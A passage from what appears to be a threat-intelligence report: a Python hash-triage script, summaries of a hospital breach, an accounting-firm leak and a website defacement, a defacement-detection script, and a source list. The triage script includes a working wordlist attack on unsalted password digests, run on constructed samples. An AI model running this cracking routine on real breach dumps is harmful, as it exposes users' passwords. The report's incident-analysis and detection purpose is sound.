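    (re.compile(r"^pbkdf2_sha256\$"), "pbkdf2_sha256"),
]
# Bare hex of these widths is read as an unsalted fast digest (assumption).
BARE_HEX = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def classify(h):
    """Return (scheme, strength); strength is "slow" for salted KDFs,
    "fast-unsalted" for bare digests, "unknown" otherwise."""
    for rx, name in PREFIXED:
        if rx.match(h):
            return name, "slow"
    if re.fullmatch(r"[0-9a-fA-F]+", h) and len(h) in BARE_HEX:
        return BARE_HEX[len(h)], "fast-unsalted"
    return "unknown", "unknown"


def crack_fast(records, wordlist):
    """Wordlist attack against the bare digests only: {email: password}.
    One pass of the wordlist serves every unsalted record at once, which is
    exactly why unsalted storage is the worst case for the users."""
    lookup = {}
    for word in wordlist:
        for algo in BARE_HEX.values():
            lookup[hashlib.new(algo, word.encode()).hexdigest()] = word
    return {email: lookup[h.lower()] for email, h in records
            if classify(h)[1] == "fast-unsalted" and h.lower() in lookup}


def triage(dump_csv, wordlist):
    """Scheme counts plus the accounts whose passwords fell to the wordlist."""
    records = [(row["email"], row["password_hash"])
               for row in csv.DictReader(io.StringIO(dump_csv))]
    schemes = Counter(classify(h)[0] for _, h in records)
    return {"total": len(records),
            "schemes": dict(schemes),
            "recovered": crack_fast(records, wordlist)}


# Constructed dump with one record per scheme; the bcrypt and argon2 strings
# are format samples only.
DUMP_CSV = """email,password_hash
a@example.com,482c811da5d5b4bc6d497ffa98491e38
b@example.com,7c4a8d09ca3762af61e59520943dc26494f8941b
c@example.com,$2b$12$R9h/cIPz0gi.URNNX3kh2OPST9/PgBkqquzi.Ss7KIUgO2t0jWMUW
d@example.com,"$argon2id$v=19$m=65536,t=3,p=4$c2FsdA$aGFzaA"
e@example.com,5d41402abc4b2a76b9719d911017c592
f@example.com,deadbeef
"""
WORDLIST = ["password", "123456", "password123", "qwerty"]   # constructed


def run_triage():
    return triage(DUMP_CSV, WORDLIST)


if __name__ == "__main__":
    print(run_triage())
```

The "unknown" bucket is the one to chase first in a real dump: it usually means a custom or truncated format, and until it is identified the safe assumption is that those accounts are as exposed as the unsalted ones.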

48. Alleged Data Breach of Olenguruone Sub-County Hospital

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T04:44:51Z
  • Victim: Olenguruone Sub-County Hospital (Hospital & Health Care, Kenya)
  • Threat Actor: kanie2903
  • Incident Description: A threat actor, “kanie2903,” claims to have leaked a database allegedly stolen from Olenguruone Sub-County Hospital in Kenya. While the specific contents of the database are not detailed, a data breach of a hospital is highly concerning due to the sensitive nature of patient health information (PHI) and personally identifiable information (PII) typically held by such institutions. This could lead to medical identity theft, targeted scams, or blackmail.
  • Threat Actor Profile: kanie2903
  • No specific information about “kanie2903” is available in the provided research material. As noted in Incident 4, “kanie2903” is likely a new or less publicly documented individual threat actor.
  • Motivations: Given the nature of the target (a hospital) and the typical monetization of such data, the primary motivation is highly likely financial gain through the sale of compromised patient or administrative data.
  • TTPs: While specific TTPs are unknown, the breach of a hospital database suggests common methods such as exploiting vulnerabilities in healthcare management systems, weak network perimeter defenses, or compromised credentials obtained through phishing. The targeting of a healthcare entity aligns with a broader trend of cybercriminals seeking high-value, sensitive data.
  • Source Links:

49. Alleged Data Breach of Anka Consulting Firm

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T04:35:28Z
  • Victim: Anka Consulting (Accounting, USA)
  • Threat Actor: flirt
  • Incident Description: A threat actor named “flirt” claims to have breached Anka Consulting, an accounting firm in the USA, exposing data from over 270 clients and leaking 1,069 sensitive documents. The compromised files reportedly include bank statements, W-9 forms, tax records, and a CSV client list with names, preparers, reviewers, and status details. This is a highly critical breach for an accounting firm, as it involves extensive financial and tax-related PII, posing severe risks of financial fraud, identity theft, and regulatory non-compliance for both the firm and its clients.
  • Threat Actor Profile: flirt
  • No specific information about “flirt” is available in the provided research material. This suggests that “flirt” is either a new or less publicly documented individual threat actor.
  • Motivations: The nature of the leaked data (financial documents, tax records, client lists) strongly indicates that the primary motivation is financial gain. This data is highly valuable for various forms of financial fraud, including tax fraud, loan fraud, and business email compromise (BEC).
  • TTPs: The exfiltration of over 1,000 sensitive documents and data from 270 clients suggests a deep compromise of Anka Consulting’s internal systems, likely involving access to document management systems or file servers. This could be achieved through network intrusion, exploitation of vulnerabilities in client portals, or successful social engineering attacks leading to credential compromise.
  • Source Links:

50. Liwaa Muhammad targets the website of Progressive Media Net

  • Incident Overview:
  • Category: Defacement
  • Date: 2025-07-02T04:27:03Z
  • Victim: Progressive Media Net (Marketing, Advertising & Sales, India)
  • Threat Actor: Liwaa Muhammad
  • Incident Description: The “Liwaa Muhammad” group claims to have defaced the website of Progressive Media Net, an Indian marketing, advertising, and sales company. A mirror link to the defaced page was provided. Website defacement is a common tactic used by hacktivist groups to publicly announce a breach, convey a political or ideological message, or simply demonstrate their capabilities.
  • Threat Actor Profile: Liwaa Muhammad
  • No specific information about “Liwaa Muhammad” is available in the provided research material. This suggests that “Liwaa Muhammad” is either a new or less publicly documented individual threat actor or group. The name is Arabic (roughly “Banner of Muhammad”), suggesting a religiously or ideologically motivated group, possibly with ties to the Middle East.
  • Motivations: Given the nature of the attack (defacement) and the group’s name, the primary motivation is likely hacktivism, aiming to make a public statement or demonstrate capability. The repeated targeting of Indian entities (as seen in subsequent incidents) suggests a focused campaign, potentially related to geopolitical or ideological grievances.
  • TTPs: Defacement typically involves exploiting vulnerabilities in web applications (e.g., CMS vulnerabilities), gaining unauthorized access to web server directories, or exploiting misconfigurations. The consistent defacement of multiple Indian websites suggests a systematic approach to identifying and compromising targets.
  • Source Links:
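
Defacements are usually discovered by outsiders, or by the attacker's own mirror post as here, rather than by the site owner. The script below is an added example for this report, not the victim's or the group's code: it fingerprints a page after stripping fragments that legitimately change on every response, compares the fingerprint with a known-good baseline, and, when the page differs, separates an ordinary content edit from a probable defacement using a title swap and a short list of marker phrases. The baseline and observed pages are constructed for a fictional site, and the volatile-fragment patterns and marker list are assumptions to tune per site.

```python
"""Content-integrity check that catches a defacement like the one claimed
above without relying on the attacker announcing it.

Added example for this report, not the victim's or the group's code. The
baseline and observed pages are constructed; the volatile-fragment patterns
and the marker list are assumptions to tune per site.
"""
import hashlib
import re

# Fragments that legitimately differ on every response and must not count
# as tampering (assumed here: CSP nonces, CSRF tokens, a render timestamp).
VOLATILE = [
    re.compile(r'nonce="[^"]*"'),
    re.compile(r'name="csrf_token" value="[^"]*"'),
    re.compile(r"Generated at \d{4}-\d{2}-\d{2}T[\d:]+Z"),
]
# Phrases common in hacktivist defacement pages (assumed list).
MARKERS = ("hacked by", "owned by", "defaced by", "pwned")


def normalize(html):
    """Strip volatile fragments and collapse whitespace so that only real
    content changes alter the fingerprint."""
    for rx in VOLATILE:
        html = rx.sub("", html)
    return re.sub(r"\s+", " ", html).strip().lower()


def fingerprint(html):
    return hashlib.sha256(normalize(html).encode()).hexdigest()


def page_title(html):
    m = re.search(r"<title>(.*?)</title>", html, re.I | re.S)
    return m.group(1).strip().lower() if m else ""


def check_page(baseline_html, observed_html):
    """Verdicts: "ok" (normalized content matches the baseline), "changed"
    (differs, no defacement signal), "suspicious" (title replaced), or
    "defaced" (a known marker is present)."""
    if fingerprint(observed_html) == fingerprint(baseline_html):
        return {"verdict": "ok", "markers": [], "title_changed": False}
    text = normalize(observed_html)
    markers = [m for m in MARKERS if m in text]
    title_changed = page_title(observed_html) != page_title(baseline_html)
    if markers:
        verdict = "defaced"
    elif title_changed:
        verdict = "suspicious"
    else:
        verdict = "changed"
    return {"verdict": verdict, "markers": markers, "title_changed": title_changed}


# Constructed pages for a fictional site; none of this is the victim's content.
BASELINE = """<html><head><title>Example Agency - Home</title>
<script nonce="a1b2c3">init()</script></head>
<body><h1>Example Agency</h1><p>Marketing and advertising services.</p>
<form><input type="hidden" name="csrf_token" value="tok-111"></form>
<footer>Generated at 2025-07-01T10:00:00Z</footer></body></html>"""

# Same page on a later request: only the volatile fragments differ.
ROTATED = (BASELINE.replace('nonce="a1b2c3"', 'nonce="z9y8x7"')
                   .replace('value="tok-111"', 'value="tok-222"')
                   .replace("2025-07-01T10:00:00Z", "2025-07-02T04:27:03Z"))

# A legitimate copy edit by the site owner.
EDITED = BASELINE.replace("Marketing and advertising services.",
                          "Marketing, advertising and sales services.")

# The page replaced wholesale, as a defacement does.
DEFACED = """<html><head><title>Owned</title></head>
<body><h1>HACKED BY EXAMPLE CREW</h1><p>Your security is low. Pwned.</p></body></html>"""


if __name__ == "__main__":
    for name, page in (("rotated", ROTATED), ("edited", EDITED), ("defaced", DEFACED)):
        print(name, check_page(BASELINE, page))
```

Run from an external vantage point (a monitor that fetches the public page, not a check on the server's own filesystem), this also catches defacements that arrive through a compromised CDN or DNS record, which a file-integrity agent on the web server would never see. The "changed" verdict should re-baseline only after a human confirms the edit.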

Works cited

  1. Scattered Spider Threat Actor Profile – Quorum Cyber, accessed July 2, 2025, https://www.quorumcyber.com/threat-actors/scattered-spider-threat-actor-profile/
  2. Scattered Spider: Threat Actor Profile – Cyble, accessed July 2, 2025, https://cyble.com/threat-actor-profiles/scattered-spider/
  3. Hellcat Hacking Group Unmasked: Investigating Rey and Pryx …, accessed July 2, 2025, https://www.kelacyber.com/blog/hellcat-hacking-group-unmasked-rey-and-pryx/
  4. Six Hackers in the United States and Abroad Charged for Crimes Affecting Over One Million Victims – FBI, accessed July 2, 2025, https://www.fbi.gov/newyork/press-releases/2012/six-hackers-in-the-united-states-and-abroad-charged-for-crimes-affecting-over-one-million-victims
  5. LulzSec – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/LulzSec
  6. DragonForce ransomware variant tied to emerging DEVMAN threat …, accessed July 2, 2025, https://www.scmagazine.com/news/dragonforce-ransomware-variant-tied-to-emerging-devman-threat-actor
  7. New SideWinder Cyber Attacks Target Maritime Facilities in Multiple Countries, accessed July 2, 2025, https://thehackernews.com/2024/07/new-sidewinder-cyber-attacks-target.html
  8. The Underground Economist: Volume 5, Issue 11 | ZeroFox, accessed July 2, 2025, https://www.zerofox.com/intelligence/the-underground-economist-volume-5-issue-11/
  9. Flash Report: U.S. Property Data Advertised for Sale on Dark Web …, accessed July 2, 2025, https://www.zerofox.com/intelligence/flash-report-u-s-property-data-advertised-for-sale-on-dark-web-forum/
  10. AHA! is Austin Hackers Anonymous, accessed July 2, 2025, https://takeonme.org/
  11. Derp (hacker group) – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/Derp_(hacker_group)
  12. GIFTEDCROOK Malware Evolves: From Browser Stealer to Intelligence-Gathering Tool, accessed July 2, 2025, https://thehackernews.com/2025/06/giftedcrook-malware-evolves-from.html
  13. Threat Actor – MISP galaxy, accessed July 2, 2025, https://misp-galaxy.org/threat-actor/
  14. Security Program Controls/Technologies | SC Media, accessed July 2, 2025, https://www.scworld.com/topic/security-program-controlstechnologies/87
  15. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed July 2, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
  16. Ghost ransomware actors compromised victims in more than 70 countries | SC Media, accessed July 2, 2025, https://www.scworld.com/news/fbi-cisa-say-ghost-ransomware-actors-compromised-victims-in-more-than-70-countries
  17. Cyberwarfare: Indian Cyber Mafia Targeting Indonesia Triggers …, accessed July 2, 2025, https://thecyberexpress.com/indian-cyber-mafia-targeting-indonesia/
  18. World Leaks: An Extortion Platform – Lexfo’s security blog, accessed July 2, 2025, https://blog.lexfo.fr/world-leaks-an-extortion-platform.html
  19. Ali Baba and the Forty Thieves – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/Ali_Baba_and_the_Forty_Thieves
  20. Iran-Linked BladedFeline Hits Iraqi and Kurdish Targets with …, accessed July 2, 2025, https://thehackernews.com/2025/06/iran-linked-bladedfeline-hits-iraqi-and.html
  21. Inside the Shadows: Understanding Active Iranian APT Groups – Picus Security, accessed July 2, 2025, https://www.picussecurity.com/resource/blog/understanding-active-iranian-apt-groups
  22. Darknet market – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/Darknet_market
  23. Europe-wide takedown hits longest-standing dark web drug market …, accessed July 2, 2025, https://www.europol.europa.eu/media-press/newsroom/news/europe-wide-takedown-hits-longest-standing-dark-web-drug-market
  24. The Islamic Revolutionary Guard Corps (IRGC) – Council on Foreign Relations, accessed July 2, 2025, https://www.cfr.org/backgrounder/irans-revolutionary-guards
  25. Iranian APT35 Hackers Targeting Israeli Tech Experts with AI-Powered Phishing Attacks, accessed July 2, 2025, https://thehackernews.com/2025/06/iranian-apt35-hackers-targeting-israeli.html
  26. List of hacker groups – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/List_of_hacker_groups
  27. Lapsus$ – Wikipedia, accessed July 2, 2025, https://en.wikipedia.org/wiki/Lapsus$
  28. Lapsus$ | Bugcrowd, accessed July 2, 2025, https://www.bugcrowd.com/glossary/lapsus/
  29. Disrupting Handala: Did OP Innovate Help Silence a Major Cyber Threat?, accessed July 2, 2025, https://op-c.net/blog/did-op-innovate-disrupt-handala-cyber-threat/
  30. Iranian hacker group targets Israeli kindergartens’ PA systems | Iran International, accessed July 2, 2025, https://www.iranintl.com/en/202501265679
  31. Audit of the Federal Bureau of Investigation’s Cyber Threat, accessed July 2, 2025, https://nsarchive.gwu.edu/sites/default/files/documents/3002264/Document-08.pdf
  32. Honor Among Crooks: The Role of Trust in Obfuscated Disreputable, accessed July 2, 2025, https://repository.arizona.edu/bitstream/handle/10150/672370/preprint_honoramongcrooks.pdf?sequence=1&isAllowed=y
  33. Privacy Impact Assessment WebTA – FBI, accessed July 2, 2025, https://www.fbi.gov/how-we-can-help-you/more-fbi-services-and-information/freedom-of-information-privacy-act/department-of-justice-fbi-privacy-impact-assessments/webta
  34. Digital Frontier Research Articles – R Discovery, accessed July 2, 2025, https://discovery.researcher.life/topic/digital-frontier/9220208?page=1&topic_name=Digital%20Frontier
  35. Pro-Iranian Hacktivist Group Leaks Personal Records from the 2024 Saudi Games, accessed July 2, 2025, https://thehackernews.com/2025/06/pro-iranian-hacktivist-group-leaks.html
  36. U.S. Agencies Warn of Rising Iranian Cyber Attacks on Defense, OT Networks, and Critical Infrastructure – The Hacker News, accessed July 2, 2025, https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html
  37. Dragonfly: Western energy sector targeted by sophisticated attack …, accessed July 2, 2025, https://www.security.com/threat-intelligence/dragonfly-energy-sector-cyber-attacks
  38. Attack Surface Analysis of the Digital Twin and Advanced Sensor and Instrumentation Interfaces – INL Digital Library – Idaho National Laboratory, accessed July 2, 2025, https://inldigitallibrary.inl.gov/sites/sti/sti/Sort_74726.pdf